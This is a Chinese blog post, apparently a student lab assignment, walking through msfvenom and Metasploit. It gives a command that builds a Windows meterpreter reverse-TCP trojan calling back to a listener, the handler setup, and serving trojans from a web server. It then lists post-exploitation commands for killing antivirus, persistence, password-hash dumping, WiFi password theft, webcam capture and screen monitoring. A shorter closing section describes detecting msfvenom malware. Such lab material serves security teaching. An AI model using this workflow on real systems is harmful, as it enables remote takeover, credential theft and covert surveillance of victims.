网络攻防作业——Msfvenom的使用

一、实验内容

1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;

2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。

3.访问网页下载木马

二、实验环境

Windows 10,kali Linux

三、实验内容

(一)生成payload

1.打开软件Msfvenom

2. Msfvenom生成Payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.100 lport=5656 -f exe -o abc.exe (-p windows/meterpreter/reverse_tcp:指定payload类型为windows 系统下运行的反向TCP连接的meterpreter

lhost=192.168.0.100:指定payload反向连接的IP地址

lport=5656:指定payload反向连接的端口号

-f exe:生成exe格式的payload -o tom.exe:保存payload为abc.exe文件名)

3.把生成的windows下可执行的exe文件复制到靶机

5.在靶机打开生成的abc.exe文件,开始监听

Msfconsole 开启监听:

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.100

set lport  5656

run

6. 进行渗透测试操作

拍照:

(二)下载

1)把生成的index.html和flash.exe木马文件移动到/var/www/html目录下,记得要打开权限,不然系统不让你移动文件),然后开启apach2:service apache2 start

2)提权

3)访问网页

命令指令:

getpid   查看当前木马进程号

Ps           查看当前进程

migrate 用于迁移进程, migrate 1408

Shell     用于进入目标shell界面,使用exit命令退出shell界面

Arp 查看内网IP,要打穿内网的话要记牢

idletime 目标服务器空闲时间,用于判断是否有人正在使用

sysinfo (查看系统信息)

getsystem(获取最高权限)

kill(杀死进程)

shutdown(关机)

reboot(重启)

netstat(查看网络连接清空)

ipconfig=ifconfig(查看本机ip)

run killav  杀死杀毒软件

run post/windows/gather/enum_computers   用于枚举域内所有用户,当然这里的目标机不属于任何域

run persistence,Meterpreter强大之处之一在于它运行于内存中,不易被杀毒软件发现,但只要目标机环境合适,或你对自己的免杀足够自信,可通过该命令写入硬盘,下次目标机启动时,木马将会自启动。

run post/multi/gather/wlan_geolocate,基于wlan进行地理位置确认

run hashdump 获取目标系统用户密码hash

run service_manager ,目标系统服务管理

run post/windows/wlan/wlan_profile ,用于读取目标主机WiFi密码

run vnc ,屏幕实时监控

  • 2
    点赞
  • 39
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msfvenom是Metasploit框架中的一个工具,用于生成各种类型的恶意软件。由于其具有强大的功能和广泛的应用,攻击者可能会使用msfvenom来制作恶意软件,以进行网络攻击和渗透测试。 要检测msfvenom,我们可以采取以下措施: 1. 使用安全工具和防火墙:使用现代的安全工具和防火墙可以检测恶意软件的传输和活动。这些工具可以检查网络流量并发现msfvenom生成的恶意软件。 2. 文件扫描:使用杀毒软件和安全扫描工具扫描文件系统,以检测是否存在恶意软件。这些工具中的病毒库通常会包含msfvenom生成的不同类型的恶意代码的特征。 3. 恶意软件行为分析:通过监视系统的行为、进程和网络活动,可以检测到可能由msfvenom生成的恶意软件引起的异常行为。例如,不寻常的文件访问、网络连接或系统资源消耗的增加等。 4. 恶意软件特征分析:通过分析已知的msfvenom生成的恶意软件的特征,可以开发特征识别规则。这些规则可以用于检测到类似的恶意软件。 5. 反向工程:对已经发现的msfvenom生成的恶意软件进行反向工程,以了解其行为和工作原理。通过对恶意软件的逆向分析,可以获得更多的知识,帮助我们检测和防范类似的威胁。 6. 及时更新和管理系统和软件:定期更新操作系统和软件,包括杀毒软件和其他安全工具。这有助于修复已知漏洞,并增强系统的安全性,从而减少msfvenom恶意软件的风险。 综上所述,检测msfvenom恶意软件需要综合使用多种安全措施和工具,包括防火墙、杀毒软件、恶意软件行为分析和特征分析等。及时更新和管理系统和软件也是减少恶意软件风险的重要步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值